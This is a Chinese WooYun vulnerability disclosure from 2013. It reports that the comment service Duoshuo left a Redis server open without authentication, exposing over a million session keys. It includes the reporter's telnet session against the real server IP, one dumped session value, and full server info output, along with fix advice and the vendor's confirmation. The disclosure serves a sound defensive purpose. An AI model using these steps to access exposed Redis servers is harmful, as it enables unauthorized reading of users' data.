漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-037974
漏洞标题:多说网某服务配置不当导致100万级数据泄露
相关厂商:多说网
漏洞作者: 秋风
提交时间:2013-09-24 13:52
修复时间:2013-11-08 13:53
公开时间:2013-11-08 13:53
漏洞类型:系统/服务运维配置不当
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-24: 细节已通知厂商并且等待厂商处理中
2013-09-24: 厂商已经确认,细节仅向厂商公开
2013-10-04: 细节向核心白帽子及相关领域专家公开
2013-10-14: 细节向普通白帽子公开
2013-10-24: 细节向实习白帽子公开
2013-11-08: 细节向公众公开
简要描述:
不能让标题存在安全隐患。。。
查了下,貌似在乌云没有提交过类似的安全问题!
听说厂商会送小礼物?
见详细说明
详细说明:
不正确的redis配置导致安全问题,上百万数据量。。。
我都不敢遍历,怕卡死= =、、、
所以只获取了一条相关key来证明此漏洞的存在!
qiufeng@ubuntu:/tmp$ telnet 118.144.80.201 6379
Trying 118.144.80.201...
Connected to 118.144.80.201.
Escape character is '^]'.
dbsize
:1309186
get PHPREDIS_SESSION:htioc1de81mpn186enogjmp2o7
$204
authorize_de7a9b5fe485f540e67361b7507c98d5|a:3:{s:6:"action";s:5:"login";s:7:"referer";s:23:"http://dev.duoshuo.com/";s:3:"sso";i:0;}login_referer|s:23:"http://dev.duoshuo.com/";expire_check|i:1379999870;
info
$1598
# Server
redis_version:2.6.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_mode:standalone
os:Linux 3.2.0-24-generic x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.7.2
process_id:31597
run_id:63c0e3afd59fb79c433352120e98cc153720aebe
tcp_port:6379
uptime_in_seconds:7742630
uptime_in_days:89
lru_clock:1685114
# Clients
connected_clients:420
client_longest_output_list:0
client_biggest_input_buf:4
blocked_clients:0
# Memory
used_memory:761047736
used_memory_human:725.79M
used_memory_rss:820125696
used_memory_peak:939262296
used_memory_peak_human:895.75M
used_memory_lua:31744
mem_fragmentation_ratio:1.08
mem_allocator:jemalloc-3.0.0
# Persistence
loading:0
rdb_changes_since_last_save:96044
rdb_bgsave_in_progress:0
rdb_last_save_time:1379999912
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:6
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
# Stats
total_connections_received:5813336406
total_commands_processed:11626595357
instantaneous_ops_per_sec:5764
rejected_connections:0
expired_keys:1844913653
evicted_keys:0
keyspace_hits:3961937815
keyspace_misses:1851335123
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:44840
# Replication
role:master
connected_slaves:0
# CPU
used_cpu_sys:951291.94
used_cpu_user:465259.50
used_cpu_sys_children:63797.91
used_cpu_user_children:337456.16
# Keyspace
db0:keys=1311659,expires=1311533
db1:keys=395670,expires=0
漏洞证明:
修复方案:
1.redis设置密码
2.限制ip
3.好基友一辈子
版权声明:转载请注明来源 秋风@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-09-24 18:37
厂商回复:
本来是限制IP的,有一次临时维护之后没调整回来,失误失误。
非常感谢。
最新状态:
暂无